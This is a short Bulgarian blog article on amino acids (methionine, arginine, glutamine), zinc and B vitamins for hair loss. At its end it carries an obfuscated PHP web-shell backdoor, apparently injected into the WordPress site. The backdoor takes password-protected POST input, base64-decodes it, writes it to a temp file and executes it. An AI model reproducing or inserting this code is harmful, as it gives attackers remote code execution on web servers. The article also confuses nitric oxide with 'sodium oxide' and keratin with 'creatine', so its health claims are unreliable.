Аминокиселините и значението им за косата | Косопад

Аминокиселините и значението им за косата

kosa-aminokiselini

Метионинът е полезен при косопад

Метионинът съдържа сяра и може да образува вериги, които могат да се свързват помежду си. Това се случва с косата и ноктите. Метионинът може да ни осигури силна структура на ноктите и косата. Полезен е и при косопад.

Аргининът благоприятства растежа на косата

Наскоро беше доказано, че аминокиселината аргинин, като предшественик на натриевият оксид, е много ефикасна при растежа на косата. Действа съдоразширяващо и подпомага растежа на косата: изобилието от натриев оксид отваря каналите за калия, подобрява кръвоснабдяването на космените корени и стимулира растежа на косата.

aminokiselina

Глутаминът е важен за създаването на косми

С напредването на възрастта, производството й в тялото се занижава. Затова добавка глутамин е важна за хората на средна възраст, за да имат здрава коса. Особено важен е глутаминът при силен стрес и тежко физическо претоварване.

Цинкът и някои витамини също са важни за косата

Също като кожата, косата има нужда от цинк. Той е много важен елемент за растежа на косата. Цинкът участва в образуването на креатин, който е важен за косата, кожата и ноктите. Тялото ни се нуждае от цинк, за да се образува колагенът, който не само е част от съединителната тъкан, но и от косата.

Витамините от В групата са много важни за растежа на косата. Витамин С също е много полезен.

24. октомври 2014 19:52:48 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}